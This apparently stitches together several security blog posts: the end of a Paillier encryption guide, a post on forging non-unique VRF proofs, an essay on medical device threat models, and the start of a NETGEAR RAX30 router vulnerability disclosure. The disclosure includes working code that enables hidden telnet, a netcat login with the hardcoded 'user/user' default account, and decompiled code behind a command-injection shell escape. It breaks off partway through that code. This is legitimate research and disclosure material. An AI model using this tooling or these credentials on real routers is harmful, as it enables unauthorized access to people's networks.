Decryption

Paillier decryption involves the secret key, , and the usual recommendations apply.

• Since decryption includes modular exponentiation to the secret value , a constant-time implementation — one without any data-dependent operations — must be used to avoid leaking information about the key.
• If the value of is pre-computed, it must be afforded the same protections as the secret key, .

Homomorphic Operations

Paillier homomorphic operations are a feature, not a bug! Still, some care must be taken.

• It is important to remember that ciphertexts are malleable by design, and provide no message authentication — they can easily be tampered with.
• Homomorphic operations apply modulo : when homomorphically adding two plaintexts or homomorphically multiplying a plaintext by some constant , the result will be their sum or product modulo .
• Certain edge cases of homomorphic operations require explicit re-randomization to retain ciphertext indistinguishability.
  To homomorphically multiply a ciphertext by 0 or 1, the ciphertext is raised to the power of 0 or 1 respectively, which either results in 1 or no change at all to the ciphertext. In these two cases, the ciphertext should be re-randomized by choosing a fresh random value and multiplying the ciphertext by modulo .

Conclusion

The Paillier cryptosystem is based on a fascinating number theoretic problem. Its homomorphic properties make it especially useful in multi-party computation protocols, such as many recent threshold ECDSA protocols. Since the security of Paillier is related to factoring, Paillier moduli must always be large enough that factoring them is infeasible. Protocols involving Paillier encryption and groups of different sizes must carefully account for the different sizes.

Finally, if being familiar with RSA and Paillier has made you want to learn more, consider reading about the Damgård–Jurik cryptosystem (b. 2001) in “A Generalisation, a Simplification and Some Applications of Paillier’s Probabilistic Public-Key System” (PKC 2001, PDF).

References

[Paillier1999]: “Public-Key Cryptosystems Based on Composite Degree Residuosity Classes” by Pascal Paillier, EUROCRYPT ’99. Available at https://link.springer.com/chapter/10.1007/3-540-48910-X_16.

[Lindell2017]: “Fast Secure Two-Party ECDSA Signing” by Yehuda Lindell, CRYPTO 2017. Available at https://link.springer.com/chapter/10.1007/978-3-319-63715-0_21 and https://eprint.iacr.org/2017/552.

[GenGol2019]: “Fast Multiparty Threshold ECDSA with Fast Trustless Setup” by Rosario Gennaro and Steven Goldfeder. Available at https://eprint.iacr.org/2019/114.

[CanGenGolMakPel2021]: “UC Non-Interactive, Proactive, Threshold ECDSA with Identifiable Aborts” by Ran Canetti, Rosario Gennaro, Steven Goldfeder, Nikolaos Makriyannis, and Udi Peled. Available at https://eprint.iacr.org/2021/060.

Acknowledgements

Thank you to Paul Bottinelli, Giacomo Pope, and Eric Schorn of Cryptography Services and Paul Grubbs for comments on an earlier version of this blog post.

This blog post presents a whirlwind overview of Verifiable Random Functions (VRFs) as used by several leading-edge blockchains, and shows how a very interesting and recently found implementation oversight causes the VRF’s assurance of uniqueness to fall apart. As VRFs are commonly used for selecting blockchain consensus voting committees, this can result in a rigged vote on the progression of consensus.

Blockchains can be considered to be distributed consensus systems that have historically used compute-intensive Proof of Work (PoW) techniques to control forward progress. As PoW can be extremely energy intensive, more advanced techniques known as Proof of Stake (PoS) have emerged that use a voting committee to control forward progress. Each node can independently self-determine whether they are a member of an upcoming voting committee through the results of a VRF, where the input originates from the current consensus state and the node’s secret key, the unique and deterministic output (alongside a node’s stake) determines the membership result, and the whole process can be subsequently verified by any/all interested third parties. If a set of nodes can maliciously join the voting committee by manipulating the VRF results, they can then vote for the wrong next consensus state.

While Verifiable Random Functions can be traced back to 1999, the subject gained new momentum in March 2017 with the release of the Internet Research Task Force (IRTF) Crypto Forum Research Group (CFRG) document draft-irtf-cfrg-vrf-00 which is now up to version 15. That document defines a VRF to be “…the public-key version of a keyed cryptographic hash. Only the holder of the secret key can compute the hash, but anyone with the public key can verify the correctness of the hash”. Simplistically, the VRF functionality consists of 3 API functions using elliptic curve techniques (hence ECVRF) that provide an assurance of uniqueness central to the discussion below. Additional background on VRFs and their multiple assurances can be found in the two prior posts noted below that were written back when the IRTF CFRG VRF document was at version 5.

1. Reviewing Verifiable Random Functions
2. Exploring Verifiable Random Functions in Code

VRF Specification Section 5.1 ECVRF Prove

This first API function utilizes an input called the alpha_string which originates with the current consensus state (e.g., perhaps the last agreed block hash) along with a secret key SK (synonymous with x below). The alpha_string is public and common to all nodes, while the secret key is fixed and specific to a particular node. The output is a VRF proof which can be loosely thought of as a seed Gamma alongside its signature/witness c and s. The steps below are simplified for clarity, where B is a generator and q is the curve order.

ECVRF Prove() Steps:

1. Use the SK as x to calculate the public key Y = x*B
2. Encode the alpha_string to an elliptic curve point H
3. Calculate Gamma = x*H
4. Generate a deterministic nonce k
5. Calculate c = Hash(Y, H, Gamma, k*B, k*H)
6. Calculate s = (k + c*x) mod q
7. Return the proof as {Gamma, c, s}

Spoiler: the implementation oversight involves a missing Gamma from the hash inputs on step 5. A node holds the calculated proof c and s elements in reserve and optionally discloses them much later during the verification step. Meanwhile, the Gamma value is used in the next function to generate the actual ‘randomness’.

VRF Specification Section 5.2 ECVRF Proof to Hash

This second API function utilizes the input Gamma as calculated in the above Prove() function and returns the final ‘randomness’ called beta_string. This output directly depends upon the hash of Gamma, while the previously calculated c and s values are not used here. The cofactor is just a curve-specific constant.

ECVRF Proof_to_Hash() Steps:

1. Given a valid decoding of {Gamma, c, s}
2. beta_string = Hash(domain_separators || cofactor * Gamma || domain_separator)
3. Return the beta_string

The calculated beta_string is the critical value used by a blockchain to allow nodes to self-determine if they are on an upcoming voting committee. The beta_string would be inspected for particular characteristics, such as its magnitude relative to a node’s stake. As each node has a different secret key SK, each node will calculate a different beta_string result. As the process from alpha_string and SK to beta_string is deterministic, there should only be one possible result. The concept of selecting a voting committee through VRF results would be broken if a node could simply rerun the process until a desired result were obtained.

Note that the nonce k does not directly participate in the calculation of the beta_string. If an adversary chose to play games with the k value, it would not result in a different beta_string (which is the only value assured of uniqueness).

VRF Specification Section 5.3 ECVRF Verify

This third API function utilizes the Gamma, c and s values calculated by the Prove() function, along with the original alpha_string, to verify that a particular beta_string was indeed generated legitimately. The beta_string could be considered a commitment with the Verify() performing a sort of signature verification.

ECVRF Verify() Steps:

1. Given a valid decoding of {Gamma, c, s}, public key Y, and alpha_string
2. Encode the alpha_string to an elliptic curve point H
3. Calculate U = s*B - c*Y
4. Calculate V = s*H - c*Gamma
5. Calculate c' = Hash(Y, H, Gamma, U, V)
6. If c and c' are equal, the proof is "VALID" otherwise it is "INVALID"

Note that the nonce k value is never seen by itself. It is ‘hidden’ in the scalars used to multiply elliptic curve points. Thus, a wrongly chosen k cannot be detected and this in fact becomes central to the break.

Nodes can demonstrate legitimate membership on the voting committee by disclosing their proof {Gamma, c, s} for anyone to verify, assuming the characteristics of the beta_string are acceptable.

Uniqueness

If the above functionality is implemented correctly, the VRF output beta_string is assured to be unique. The IRTF CFRG VRF specification defines Full Uniqueness in section 3.1 as follows:

Uniqueness means that, for any fixed VRF public key and for any input alpha, it is infeasible to find proofs for more than one VRF output beta.

In the context of blockchains, this can be visualized as: given a current state alpha_string and a single secret/public key pair, a node can only generate a single output beta_string that passes verification. Thus, ‘the dice that determine a node’s voting committee membership for the current state can only be rolled once’.

Breaking Uniqueness

As mentioned in the spoiler above, a hash function that misses Gamma in both Prove() step 5 and Verify() step 5 will seem to work fine in practice but its uniqueness can be broken with some effort. Specifically, for a given alpha_string and secret key, a malicious prover can generate arbitrary proofs that will correctly verify under their public key. Let us choose k and calculate a proof of the following form using exponential notation (where cInv is c^-1). Note that the hash does not contain Gamma, which is the source of the ‘opportunity’ as the oversight allows c to be calculated fully independently of Gamma.

{Gamma = H^{(sk + cInv)}, c = Hash( Y || H || B^{(k + 1)} || H^k ), s = k + (sk + cInv) * c}

If multiple proofs of this form were generated by multiple choices of k, then we have multiple Gamma values that would then result in different non-unique beta_strings. But would they verify?

Given an instance of the above proof, the Verify() steps will calculate the following two values.

U = B^s – Y^c = B^{(k + (sk + cInv)c)} – B^sk*c = B^{(k + sk*c + 1 – sk*c)} = B^{(k + 1)}
V = H^s – Gamma^c = H^{(k + (sk + cInv)}c) – H^{(sk + cInv)*c} = H^{(k + sk*c + 1 – sk*c – 1)} = H^k

This will result in the following c’ which will indeed validate.

c’ = Hash( Y || H || B^{(k + 1)} || H^k)

As a result, a set of nodes can rerun Prove() with different choices of k until the obtain a beta_string that gains membership on the voting committee. At that point, the fake electors can vote for world peace.

The author would like to thank Parnian Alimi, Giacomo Pope, Kevin Henry, Eli Sohl, Aleksandar Kircanski and Paul Bottinelli of NCC Group’s Cryptography Services team for their review of this post. All issues remain with the author.

Medical device security is gaining more attention for several reasons. The conversation often gets connected to device safety, that is, the degree to which the risk of patient harm is limited by preventing or controlling for device malfunction. Device security expands the scope of safety by supposing a malicious attacker is causing or exploiting the device to malfunction. If it’s not secure, it’s not safe.

The threat model for medical devices has changed over time. Previously, a lack of connectivity, the inherent physical controls in a medical facility or within one’s home, and the generally high cost and low availability of these niche devices for research all limit the exploitability of any lingering vulnerabilities.

However, the advancement of connected health highlights the importance and subtle distinctions associated with securing the ever-growing set of medical devices. At NCC Group, we have previously written about the importance of securing any connected device. In this blog post, we specifically focus on medical devices from a hardware security researcher’s perspective. We go on to discuss how the regulatory landscape attempts to align with this view.

A Unique and Varied Threat Model

While the threats and corresponding mitigations that apply to a medical device may resemble that of any typical hardware threat model, at a minimum, the severity associated with a typical vulnerability class is likely to differ, potentially significantly. A remote code execution exploit is just as likely to be critical for a medical device as it would be with any other IoT product, but the impact of lesser vulnerabilities may be increased as well. Furthermore, because of the specialized problems that healthcare devices are designed to address, correspondingly unique threats may become apparent. A traditional goal of an adversary may be complete device compromise, running arbitrary and potentially malicious software on the device, but note the stakes are often higher in the case of medical devices. Gaining control of some sensor or actuator may have serious impacts, but that impact is more perilous when the device is interfacing with a human body.

In some contexts, a user’s personal data can be valuable to an adversary, but patient healthcare data is inherently more so. User data leakage is historically treated according to the value of the data and breadth of the incident – credit card numbers and passwords are serious, and usernames are typically less so depending on the circumstances. Leaking so much as a patient’s name carries more weight when it effectively maps that individual to a medical condition or some immutable attribute of theirs. Patient data is tightly coupled with the core functionality of many medical devices. The attack surface may be significantly greater as a result if operation of the system requires this data to be more exposed, whether it must be stored persistently, communicated between multiple processes over some IPC channel, or transmitted to a remote back end. Certain aspects of user privacy are too often an afterthought in the consumer technology space, but medical information is one asset where users/patients expect a much greater degree of scrutiny and protection. To that effect, user privacy is often treated as a separate entity or extension of device security. Data can include health conditions, family history, routines and activities, genetic information, and perhaps soon, even one’s own thoughts. Such a privacy breach is therefore justifiably covered by longstanding laws in the US and EU, presenting more serious consequences to the manufacturer as a result.

For another example, consider a denial-of-service vulnerability. The severity of these weaknesses is often deemed less significant, and the risk of exploitation is acceptable for many products. This evaluation changes dramatically for a battery-powered medical implant. For example, a denial-of-service could result in serious harm to the patient due to missed treatment. Furthermore, even if patient harm is not an immediate concern, additional surgery to replace an unrecoverable implant may be necessary, which is much more significant than replacing some unusable office equipment.

The above examples highlight some of the unique threats inherent with many medical devices. Several other fairly common factors skew the threat landscape further.

Attack Surface

Not long ago and still reasonably common today, a typical medical device design pattern may involve recording patient data or administering some therapy, and then connecting physically to an offline host machine in a physically secure clinic for medical staff to interact with the device thereafter. A predictable evolution of such a device would be to add wireless connectivity, thus supporting interaction at an arbitrary location – common implementations include the use of an Internet connection and a mobile or web application. With that functionality comes additional attack surface not previously considered in the prior generation. Note a unique aspect in this circumstance: Such a device is likely to need to connect to a hospital/clinic network potentially exposing it to everything else on that network and vice versa. That same device may split time on patients’ home networks as well, further exposing it to a variety of network-based threats.

As with other heavily regulated industries, the mere concept of updateable software and firmware is somewhat novel in the medical device space. It is relatively straightforward to develop firmware for a device that is effectively immutable, test it extensively, and then expect to only update it in the event of a recall, perhaps involving a specialized technician performing that update on-site or swapping out the entire device. This model falls short knowing that new vulnerabilities, including those found in third-party software, are discovered with increasing frequency, a fact exacerbated by the growing complexity of these devices. As such, the capability for over-the-air updates is now widely expected for any device with a network connection. Naturally, this feature happens to be a prime attack vector if it is poorly designed or implemented.

Users and Permissions

Multiple types of users may interact with these devices, namely: patients, caregivers, medical staff, hospital IT administrators, not to mention OEM administrators or service technicians as well. This is quite distinct from, say, a smartphone that is almost exclusively accessed by its user/owner for its entire lifetime. The authorization of these roles to specific application and device capabilities can quickly become complex and an easy target for privilege escalation. Over their lifetime, some devices may be used by multiple patients, presenting further possibility of patient data exposure even after treatment is concluded. This is akin to second-hand device and rental car scenarios, highlighting the importance of a factory reset function that securely erases all patient data and reliably returns the device to a known good state. For a medical device, flash memory that is not securely erased may be re-deployed to a new patient while still containing the old home Wi-Fi password, credit card number, or private medical information of the previous patient. Obsolete equipment sold as surplus may still contain the means to access mission-critical hospital infrastructure.

Longevity and Maintenance

Speaking of product lifetime, medical devices are often expected to be supported longer than the oft-seen three-to-five-year window for many consumer IoT products. Managing software updates for that duration is challenging, requiring careful management of vendor relationships, third-party patches and firmware deployment, all in a timely manner. Some third-party software components may fall out of support and significant changes to software dependencies may qualify as significant enough design changes to trigger regulatory re-approval. This all presents an environment where stale software is more likely to exist on the product as it ages. While known critical vulnerabilities may be addressed appropriately, those that are low severity or in deeply embedded dependencies may be overlooked. Regulators require a defined software bill of materials (SBOM) for medical devices, expecting OEMs to demonstrate that they are at least aware of everything included in their device, but maintaining (and patching!) all of that software is just as important and potentially more challenging for the pieces out of their direct control.

Complexity and Novelty

Another aspect of complexity applies to the device design itself. While not an absolute, consumer IoT devices and commoditized products are less likely to deviate much from a vendor reference design, perhaps using a known SoC and baseband combination with established security configuration features and relatively little custom hardware, along with a vetted Board Support Package (BSP) including an OS, drivers, bootloader, and libraries that implement the core security features of the product. Many medical devices are attempting to solve niche problems with significant constraints using creative solutions, and this may require custom board or FPGA design, a novel algorithm that accepts external inputs, or some unique communication interface to get data from the patient’s body to an appropriate destination, all of which have been subject to less scrutiny than required.

Finally, there exists an economic/business factor that may be of interest to a security researcher. The medical device environment is, in many cases, one of pure research and engineering. In cases where a device originates in an academic or startup environment, costs will be constrained, and security is more likely to be deprioritized in favor of development of the novel medical aspects of the technology. Instead of some incremental improvement on a common device, these are often first-generation devices with yet-to-be-seen behaviours and potential misbehaviours.

Classification

There exists several proposed and conventional criteria to classify medical devices for regulatory purposes or otherwise depending on the context. Patient safety, the existence of a similar design (i.e., the novelty of the function), the range of the connectivity interfaces used, the physical environment (hospital, home, public), and ownership of the device all serve to classify device types. A networked MRI machine is markedly different from a portable EKG in many ways.

Interestingly, these classifications also serve as guidance for a security researcher, providing an additional rough measure of the threats associated with the device. Higher potential for patient harm (e.g., a class III or IV device) significantly escalates impact of even the most limited vulnerabilities like the ability to degrade battery life.

More user roles may also suggest a greater likelihood of privilege escalation or authorization bypass. Here, an example problem may be a vulnerability that unlocks device calibration capabilities that would otherwise be accessible only to a service technician.

A device’s connectivity, say whether it connects via BLE to a mobile application or relies on a hardwired ethernet connection for all interactions, has a clear mapping to attack surface. Devices that stay in a clinic or are attached to a patient in their daily life helps establish the likelihood of physical threats to the device. Finally, novel products are potentially more likely to have custom, under-scrutinized software or a class of vulnerability that may not have been considered.

Regulation Landscape

The FDA, EU, and other global medical device regulators are beginning to acknowledge this complexity. Of course, there was a time when these regulatory bodies did not have to concern themselves with medical devices as we know them today, much less internet-connected ones that may be reprogrammed to operate in an unintended manner. While we have discussed the set of common traits that tend to distinguish medical devices from other hardware in general, there remains a challenge in effectively evaluating these devices to be safe for use and therefore secure from attack given the variety of threats that they face.

Regulators have traditionally relied on post-market response to address most cybersecurity concerns – patching or recalling products as necessary. Recognizing that this can be expensive, skews incentives, and may be insufficient to address all security concerns, premarket guidance and requirements have more recently been a focus of regulation in the industry. Compliance of this nature presents a difficult trade-off of applying a general process to a diverse set of products and have it be effective enough. Usually this leads to a low bar to meet – a checklist step in QA just prior to product release. Of course, this is neither appropriate nor desirable in a market where the impact to the users/patients can be so significant.

A naive approach to objectively measuring device security is to focus on the final product – beginning with a set of requirements that can be applied to a broad set of devices based on a general threat model or profile developed by a standards body. This attempts to provide some fundamental measure of the security of the product and its users based on whether those requirements are met or not. The benefit to such a method is it avoids encumbering the OEM, keeping “security” and “certification” to a relatively known cost and effort to fit nicely in the development schedule running alongside QA.

Medical device regulation, such as that established in the FDA’s guidance for medical device security, predominantly takes a more comprehensive “show your work” approach like that of other burgeoning programs related to hardware security. This guidance defines a Secure Product Development Framework (SPDF), which includes many intersection points with the product development lifecycle – an initial risk assessment, ample architecture documentation, product security requirements, threat modeling, and informed testing. These can take months of effort instead of weeks to do properly, but more effectively account for the unique threats applicable to a connected health product and the appropriate controls to address them. Recently, the FDA has stated that 510(k), pre-market authorizations, and De Novo applications for medical device approval may be refused on the grounds of insufficient evidence of the product being secure, so it is important for manufacturers to take this seriously.

In 2019, the EU provided similar guidance to serve as a precursor to more explicit regulation. The MDR states the single mandatory requirement related to device security:

For devices that incorporate software or for software that are devices in themselves, the software shall be developed and manufactured in accordance with the state of the art taking into account the principles of development life cycle, risk management, including information security, verification and validation.

The requirement itself is vague, but the accompanying guidance clearly establishes a similarly high expectation regarding the assessment and control for the security threats posed to any prospective device.

Conclusion

Now, more than ever, medical devices present an interesting landscape of potential targets for security research. They are becoming more connected (and so more exposed to attack) and more capable of accomplishing amazing and life-changing healthcare outcomes for their users (and so more impactful if they are made to do otherwise). While these medical products often employ the same underlying technologies and hardware security principles as other IoT products the set of threats associated to the devices, their users, and their OEMs are often unique or significantly different. Regulators recognize this fast-changing environment and the need for intelligent, holistic, and qualitative secure development methodologies applied throughout the product lifecycle.

• Summary
• Advisories
• Vulnerabilities
  • Telnet
    • PSV-2023-0008 – Telnet Default Account Privilege Escalation Breakout
  • Web Application
    • PSV-2022-???? – JSON Response Stack Data Leak
  • SOAP Service
    • PSV-2023-0009 – Write HTTP Response Stack Pointer Leak
    • PSV-2022-???? – SOAPAction Stack Buffer Overflow
    • PSV-2023-0010 – HTTP Body Off-By-One NULL Terminator Stack Canary Corruption
    • PSV-2023-0011 – HTTP Protocol Stack Buffer Overflow
    • PSV-2023-0012 – SOAP Parameters Stack Buffer Overflow
• Conclusion

Summary

The following vulnerabilities were identified on the NETGEAR Nighthawk WiFi 6 Router (RAX30 AX2400) and may exist on other NETGEAR router models. All vulnerabilities discussed are patched in firmware version 1.0.10.94.

The vulnerable firmware can be downloaded on NETGEAR’s website at RAX30-V1.0.7.78.zip and RAX30-V1.0.9.92.zip.

Advisories

NETGEAR published the following advisories covering the majority of these vulnerabilities:

• Security Advisory for Multiple Vulnerabilities on the RAX30, PSV-2023-0008 PSV-2023-0009
• Security Advisory for Pre-Authentication Buffer Overflow on the RAX30, PSV-2023-0012

Vulnerabilities

Telnet

By design, no shell to gain command line access to the router was documented by NETGEAR. However, it was observed that the binary /usr/bin/pu_telnetEnabled was running on port 23/udp on the router’s LAN side interface, which could receive a specially crafted packet to enable telnet.

Various researchers have previously analyzed this binary in the past, as seen at OpenWRT NETGEAR Telnet Console and GitHub NETGEARTelnetEnable. However, the provided code to enable telnet did not work for this specific NETGEAR RAX30 AX2400 model. This is because, for historical versions of /usr/bin/pu_telnetEnabled, the admin password was sent in plaintext after being decrypted, whereas on this version, the password was expected to be hashed using SHA-256 before encryption.

The /usr/bin/pu_telnetEnabled binary listened for a custom encrypted packet containing the device admin username, admin password and LAN MAC address. It was possible to reverse engineer the binary by extracting the binary from the firmware image that could be publicly downloaded from NETGEAR’s website. The exact specifics on the packet format and encryption used remained the same as detailed in OpenWRT NETGEAR Telnet Console.

The following C program (telnet_packet_encrypt.c) was used to encrypt the payload with the Blowfish algorithm and must be compiled with Rupan/blowfish.

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>
#include "blowfish/blowfish.h"

// gcc telnet_packet_encrypt.c blowfish.c -o telnet_packet_encrypt

void printBuffer(uint8_t* buffer, int length)
{
    for (int i = 0; i < length; i++)
        printf("%02x", buffer[i]);
}

bool hexStringToBytes(char* hex, char* buffer, size_t bufferSize)
{
    size_t hexLength = strlen(hex);

    size_t index = 0;
    for (size_t i = 0; i < hexLength; i += 2)
    {
        if (index >= bufferSize)
            return false;
        sscanf(hex + i, "%2hhx",  buffer[index]);
        index++;
    }
    return true;
}

int main(int argc, char* argv[])
{
    if (argc != 3)
    {
        printf("Usage: %s <key> <hex-payload>", argv[0]);
        return 1;
    }

    char* key = argv[1];
    size_t keyLength = strlen(key);

    char* hexPayload = argv[2];
    size_t hexPayloadLength = strlen(hexPayload);

    // Ensure key is not empty
    if (strlen(key) <= 0)
    {
        printf("Error: Key parameter must not be empty.");
        return 2;
    }

    // Ensure hex payload is not empty
    if (hexPayloadLength != 0x80 * 2)
    {
        printf("Error: Payload parameter must be 0x80 bytes.");
        return 3;
    }

    // Ensure hex payload size is a multiple of 2
    if (hexPayloadLength % 2 != 0)
    {
        printf("Error: Payload parameter must be a valid hex string.");
        return 4;
    }

    // Get the hex payload as bytes
    size_t plaintextBufferSize = (size_t)(hexPayloadLength / 2);
    uint8_t* plaintextBuffer = (uint8_t*)malloc(plaintextBufferSize);
    hexStringToBytes(hexPayload, plaintextBuffer, plaintextBufferSize);

    // Initalise Blowfish
    BLOWFISH_CTX gContext;
    Blowfish_Init( gContext, key, keyLength);

    // Encrypt plaintextBuffer to encryptedBuffer
    uint32_t encryptedBuffer[plaintextBufferSize / sizeof(uint32_t)];
    uint8_t* pPlaintextCurrent = plaintextBuffer;
    for (uint8_t* pCurrent = (uint8_t*)encryptedBuffer; (uint64_t)pCurrent - (uint64_t)encryptedBuffer < plaintextBufferSize; pCurrent += 8)
    {
        uint8_t* pcVar2 = pCurrent - 1;
        uint8_t* pcVar6 = pPlaintextCurrent;
        uint8_t* pcVar7;
        do {
            pcVar7 = pcVar6 + 1;
            pcVar2 = pcVar2 + 1;
            *pcVar2 = *pcVar6;
            pcVar6 = pcVar7;
        } while (pcVar7 != pPlaintextCurrent + 8);
        Blowfish_Encrypt( gContext, (uint32_t*)pCurrent, (uint32_t*)(pCurrent + 4));
        pPlaintextCurrent += 8;
    }
    printBuffer((uint8_t*)encryptedBuffer, plaintextBufferSize);
    return 0;
}

The following Python3 script (pu_telnetenable.py) could then be executed to enable telnet on port 23/tcp on the router if the supplied username, password and MAC address are valid. This itself is not a vulnerability as it was hidden functionality implemented by NETGEAR and still required valid admin credentials in order to gain access to the shell.

import socket
import subprocess
import os
import argparse
import re
import sys
import Crypto.Hash.SHA256
import Crypto.Hash.MD5

import sys

class Logger:
    DEFAULT = '\033[0m'
    BLACK = '\033[0;30m'
    RED = '\033[0;31m'
    GREEN = '\033[0;32m'
    ORANGE = '\033[0;33m'
    BLUE = '\033[0;34m'
    PURPLE = '\033[0;35m'
    CYAN = '\033[0;36m'
    LIGHT_GRAY = '\033[0;37m'
    DARK_GRAY = '\033[1;30m'
    LIGHT_RED = '\033[1;31m'
    LIGHT_GREEN = '\033[1;32m'
    YELLOW = '\033[1;33m'
    LIGHT_BLUE = '\033[1;34m'
    LIGHT_PURPLE = '\033[1;35m'
    LIGHT_CYAN = '\033[1;36m'
    WIHTE = '\033[1;37m'

    @staticmethod
    def write(message = ''):
        print(message)

    @staticmethod
    def space():
        Logger.write()
    
    @staticmethod
    def fatal(code, message = ''):
        Logger.error(message)
        sys.exit(code)

    @staticmethod
    def error(message = ''):
        Logger.write(Logger.RED + '[-] ' + message + Logger.DEFAULT)

    @staticmethod
    def warning(message = ''):
        Logger.write(Logger.ORANGE + '[!] ' + message + Logger.DEFAULT)

    @staticmethod
    def info(message = ''):
        Logger.write(Logger.BLUE + '[#] ' + Logger.DEFAULT + message)

    @staticmethod
    def success(message = ''):
        Logger.write(Logger.GREEN + '[+] ' + Logger.DEFAULT + message)

class Payload:
    def __init__(self, username, password, mac, log = True):
        self.username = username
        self.password = password
        self.mac = mac
        self.signature = None

        # SHA256 Hash password
        self.sha256PasswordHash = Crypto.Hash.SHA256.new(self.password.encode('ascii')).digest().hex()

        # Create payload
        if log:
            Logger.info('Creating payload...')
        self.payload = self.create(log)

        # Encrypt payload
        if log:
            Logger.info('Encrypting payload...')
        self.encrypted = self.encrypt(log)

    # typedef struct {
    #     char signature[16];      // 0x00
    #     char mac[16];            // 0x10
    #     char username[16];       // 0x20
    #     char password[65];       // 0x30
    #     uint8_t reserved[15];    // 0x71
    # } Payload;
    def create(self, log = True):
        # Pad variables
        bMac = self.mac.encode('ascii').ljust(16, b'\x00')
        bUsername = self.username.encode('ascii').ljust(16, b'\x00')
        bPassword = self.sha256PasswordHash.encode('ascii').ljust(65, b'\x00')
        bReserved = b'\x00' * 15

        # Build content
        bContent = bMac + bUsername + bPassword + bReserved
        assert(len(bContent) == 0x70)

        # Build MD5 hash signature
        self.signature = Crypto.Hash.MD5.new(bContent).digest()
        bSignature = self.signature

        # Build payload
        bPayload = bSignature + bContent
        assert(len(bPayload) == 0x80)

        if log:
            Logger.info('')
            Logger.info('payload {')
            Logger.info('    signature: ' + bSignature.hex())
            Logger.info('    mac: ' + bMac.hex() + ' (' + bMac.decode('ascii') + ')')
            Logger.info('    username: ' + bUsername.hex() + ' (' + bUsername.decode('ascii') + ')')
            Logger.info('    password: ' + bPassword.hex() + ' (' + bPassword.decode('ascii') + ')')
            Logger.info('    reserved: ' + bReserved.hex())
            Logger.info('}')
            Logger.info('')

        return bPayload

    def encrypt(self, log = True):
        key = "AMBIT_TELNET_ENABLE+" + self.sha256PasswordHash

        # Encrypt the packet
        process = subprocess.Popen([os.path.dirname(os.path.realpath(__file__)) + '/telnet_packet_encrypt', key, self.payload.hex()], stdout=subprocess.PIPE)
        stdout, stderr = process.communicate()

        encryptedPayload = bytearray.fromhex(stdout.decode('ascii'))

        if log:
            Logger.info('')
            Logger.info('encrypted payload')
            for i in range(0, len(encryptedPayload), 8):
                Logger.info('    ' + encryptedPayload[i:i + 8].hex())
            Logger.info('')

        return encryptedPayload

    def send(self, ip, port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        sock.sendto(self.encrypted, (ip, port))

class Validation:

    @staticmethod
    def validateUsername(username):
        if len(username) <= 0:
            return "admin"
        if len(username) > 16:
            Logger.fatal(1, 'Username exceeds the maximum length of 16.')
        return username

    @staticmethod
    def validatePassword(password):
        if password == None:
            return ""
        if len(password) > 65:
            Logger.fatal(2, 'Password exceeds the maximum length of 65.')
        return password

    @staticmethod
    def validateMac(mac):
        mac = mac.replace(':', '').upper()
        if not re.match(r"[A-F0-9]{12}", mac):
            Logger.fatal(3, 'MAC address is invalid.')
        return mac

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Enable telnet on NETGEAR RAX30 router.')
    parser.add_argument('--ip', default='192.168.1.1', help='The NETGEAR router IP address.')
    parser.add_argument('--port', default=23, type=int, help='The UDP port to connect to.')
    parser.add_argument('--username', default='admin', help='The account username.')
    parser.add_argument('--password', help='The account password.')
    parser.add_argument('--mac', required=True, help='The router LAN MAC address.')

    args = parser.parse_args()
    
    if os.name == 'nt':
        Logger.fatal(4, 'Windows not supported')

    # Validate and create payload    
    payload = Payload(
        Validation.validateUsername(args.username),
        Validation.validatePassword(args.password),
        Validation.validateMac(args.mac)
    )

    # Send payload
    Logger.info('Sending payload...')
    payload.send(args.ip, args.port)

    Logger.info('Payload sent!')

PSV-2023-0008 – Telnet Default Account Privilege Escalation Breakout

A default account command injection breakout vulnerability was present in the /lib/libcms_cli.so library imported by the custom NETGEAR /bin/telnetd binary running on port 23/tcp. By default, this port is not open in the firewall, and therefore it must be opened in order to leverage this vulnerability. This port could be opened by the hidden /usr/bin/pu_telnetEnabled service running on port 23/udp, as discussed previously, or by another vulnerability.

Authentication

The NETGEAR router ships with a default “user” account, which has a hardcoded password of “user”. Standard authentication of this user to telnet provides you with a telnet console that has a limited number of commands:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.2.1 23
!BCM96750 Broadband Router
Login: user
Password: user
> help
help
?
help
logout
exit
quit
reboot
exitOnIdle
ping
lanhosts
passwd
restoredefault
save
swversion
uptime
wan
> sh
telnetd::214.801:error:processInput:384:unrecognized command sh

As you can see, by default, the user only has permission to run a small number of commands and cannot execute the hidden “sh” command due to incorrect account permissions.

Shell Escape

The /lib/libcms_cli.so library handles the command line command received by the user in the cli_processCliCmd function. This function checks the first word of the command against a list of commands in the libraries data section, which are stored using the following C Command structure:

struct Command
{
    char * name;
    char * description;
    uint8_t permission;
    uint8_t lock;
    uint8_t field4_0xa;
    uint8_t field5_0xb;
    void * execute;
};

The structure data in the binary for the vulnerable ping command structure is seen below:

00039d98 23 5b 02 00 23  Command                           [27]
        5b 02 00 c1 00 
        00 00 00 00 00
    00039d98 23 5b 02 00     char *    s_ping_00025b15+14      name          = "ping"
    00039d9c 23 5b 02 00     char *    s_ping_00025b15+14      description   = "ping"
    00039da0 c1              uint8_t   C1h                     permission
    00039da1 00              uint8_t   '\0'                    lock
    00039da2 00              uint8_t   '\0'                    field4_0xa
    00039da3 00              uint8_t   '\0'                    field5_0xb
    00039da4 00 00 00 00     void *    00000000                execute

ping is a command the user has permission to access, and additionally, it has a NULL execute function pointer. Therefore, the code executes the command directly as a shell command [1], as shown in the following cli_processCliCmd function:

int cli_processCliCmd(char *command)
{
    int ret = 0;

    char _command [4096];
    memset(_command,0,4096);
    int cmp = strncasecmp(command, "netctl", 6);
    if (cmp == 0) {
        command = command + 7;
    }

    // Copy command to local buffer
    strcpy(_command, command);
    size_t commandLength = strlen(_command);

    // Calculate the command first word length
    size_t givenCommandFirstWordLength = 0;
    char* commandName = _command;
    while ((givenCommandFirstWordLength != commandLength    (*commandName != ' '))) {
        givenCommandFirstWordLength = givenCommandFirstWordLength + 1;
        commandName = commandName + 1;
    }

    // Find command in command list
    uint8_t currentPermission = currPerm;
    int commandIndex = 0;
    Command *pCommand = pCommands;
    while (true) {
        commandName = pCommand->name;
        size_t commandNameLength = strlen(commandName);

        if (((commandNameLength == givenCommandFirstWordLength)   
            (ret = strncasecmp(_command, commandName, givenCommandFirstWordLength), ret == 0))   
            ((currentPermission   pCommand->permission) != 0)) break;

        commandIndex++;
